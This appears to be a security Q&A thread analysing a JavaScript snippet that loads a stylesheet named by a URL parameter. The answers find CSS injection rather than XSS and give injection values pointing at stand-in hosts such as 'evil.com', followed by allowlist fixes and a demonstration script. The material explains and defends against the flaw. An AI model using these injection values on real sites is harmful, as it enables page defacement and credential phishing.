Is this code vulnerable to Reflected XSS?
I'm doing a pentest and came by this code:
```javascript
(function() {
  // Pick the stylesheet name: css= query parameter first, else the first hostname label
  var subdomain = (function() {
    var query = /[?&]css=([^&#]*)/i.exec(window.location.search);
    if (query)
      return query[1];
    var URL = window.location.host.split('.');
    if (URL.length > 1)
      return URL[0];
  })();
  if (subdomain) {
    // Append <link rel="stylesheet" href="/<subdomain>.css"> to <head>
    var link = document.createElement('link');
    link.rel = "stylesheet";
    link.href = "/" + subdomain + ".css";
    document.getElementsByTagName('head')[0].appendChild(link);
  }
})();
```
It adds a CSS file to the header for rebranding.

The target URL looks like this: `http://some.company.com/p1=test&css=custom`

We have controlled the `subdomain` parameter here, which equals either `query` or `URL[0]`. `query` is the result of `/[?&]css=([^&#]*)/i.exec(window.location.search);`, which equals `custom` in this case.

If the `query` is not available in the URL, then `URL[0]` equals `some` here. I can't think of doing anything useful using `URL[0]` because, in order to control its value, I have to change `some` to something else, which completely changes the URL and points to some other irrelevant page.

Anyway, the final CSS URL would be `"/custom.css"`, or `"/some.css"` if the CSS parameter is not available.

I tried some payloads to exploit this but all failed.

Any ideas if this code is vulnerable and how it can be exploited?
xss reflected-xss
asked 2 days ago by Sam, edited yesterday by R1-
dandavis (comment, 2 days ago): `//domain.tld/bad.css` is a potentially valid URL. No XSS, but a CSS injection potential.
3 Answers
Accepted answer (score 10)

Yes, this code is vulnerable, but not to XSS. The `subdomain` variable's value can indeed be controlled by an attacker, but that variable is only used to set the href parameter of a CSS stylesheet, which won't accept JavaScript code. However, controlling this value does still allow CSS injection.

The stylesheet's href is prefixed by `/`, but an attacker can still point it to an arbitrary page by adding another slash to form a protocol-relative URL pointing to the attacker's server (e.g. `//evilsite.com/payload.css`). This would allow the attacker to get complete control over the site's appearance, if not its functionality, which could be used to trick users into taking actions they wouldn't otherwise take. (For example, add a banner telling users they need to reset their password, then style the user settings page to make their public profile description field look like the input box for "current password".)
answered 2 days ago by Ajedi32, edited 2 days ago
Bergi (comment, 2 days ago): CSS might contain executable code - not for all browsers, but still.
Answer (score 5)

> Any ideas if this code is vulnerable and how can it be exploited?

As mentioned in the comments, this code could be vulnerable to CSS injection.

For example, if the URL looks like:

`http://some.company.com/p1=test&css=/evil.com/more_evil`

Then this JavaScript will create a new link in the header like:

`<link rel="stylesheet" href="//evil.com/more_evil.css">`

Which is a valid URL (even without the scheme http/https), which can access the remote CSS file.
answered 2 days ago by hft
hft (comment, 2 days ago): You could avoid this specific issue by changing the regex to: `/[?&]css=([a-zA-z]*)/`
Answer (score 1)

It is vulnerable but you can solve that easily with whitelisting:

```javascript
function selectBrand() {
  var allowedBrands = ['brand1', 'brand2', 'brand3'],
      query = /[?&]css=([A-Za-z0-9]*)/i.exec(window.location.search);
  // indexOf() returns -1 (truthy) for unknown values, so compare explicitly
  if (query && allowedBrands.indexOf(query[1]) !== -1)
    return query[1];
  else
    return allowedBrands[0]; // this is the default value
}
```
answered yesterday by Matías Pizarro (new contributor)
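The question's selection logic beside an allowlisted version, as an added example that is not code from the question or from any of the answers: it models the protocol-relative escape the accepted answer describes and the whitelisting fix from the last answer, using constructed brand names and page URL, and uses the URL API to check which origin the final href actually resolves to.

```javascript
// Added example, not code from the question or any answer: the question's
// stylesheet-selection logic as pure functions (search string and hostname
// passed in instead of read from window.location), beside a hardened variant.
// The brand names and the page URL below are constructed for this example.

// Same selection rule as the question's code: the css= query parameter wins,
// otherwise the first label of the hostname is used.
function pickSubdomain(search, host) {
  const query = /[?&]css=([^&#]*)/i.exec(search);
  if (query) return query[1];            // "" for "?css=", which then adds no link
  const labels = host.split(".");
  if (labels.length > 1) return labels[0];
  return undefined;
}

// Original construction: "/" + subdomain + ".css" with no validation. A value
// that itself starts with "/" yields "//host/...", a protocol-relative URL.
function buildHrefOriginal(search, host) {
  const subdomain = pickSubdomain(search, host);
  return subdomain ? "/" + subdomain + ".css" : null;
}

// Hardened construction (hypothetical allowlist): the candidate must match a
// strict identifier pattern AND be a known brand, otherwise the default is
// used. The membership test uses includes(); a bare "if (list.indexOf(x))"
// is wrong because -1 (not found) is truthy.
const ALLOWED_BRANDS = ["brand1", "brand2", "brand3"];
function buildHrefSafe(search, host) {
  const candidate = pickSubdomain(search, host);
  const ok = typeof candidate === "string" &&
    /^[a-z0-9-]+$/i.test(candidate) && ALLOWED_BRANDS.includes(candidate);
  return "/" + (ok ? candidate : ALLOWED_BRANDS[0]) + ".css";
}

// Defence-in-depth check: resolve the href the way the browser would and
// report the origin the stylesheet request goes to. The same check can guard
// the appendChild() call at runtime (refuse any href that leaves the origin).
function stylesheetOrigin(href, pageUrl) {
  return new URL(href, pageUrl).origin;
}

// Compares both constructions for one request; PAGE/HOST are constructed.
const PAGE = "http://some.company.com/";
const HOST = "some.company.com";
function summarize(search, host = HOST, pageUrl = PAGE) {
  const href = buildHrefOriginal(search, host);
  const origin = href === null ? null : stylesheetOrigin(href, pageUrl);
  const crossOrigin = origin !== null && origin !== new URL(pageUrl).origin;
  return { href, origin, crossOrigin, hardened: buildHrefSafe(search, host) };
}

console.log(summarize("?p1=test&css=custom"));
console.log(summarize("?p1=test&css=/evil.com/more_evil"));
```

For the second request the original construction reports `crossOrigin: true` with origin `http://evil.com`, while the hardened one falls back to `/brand1.css`.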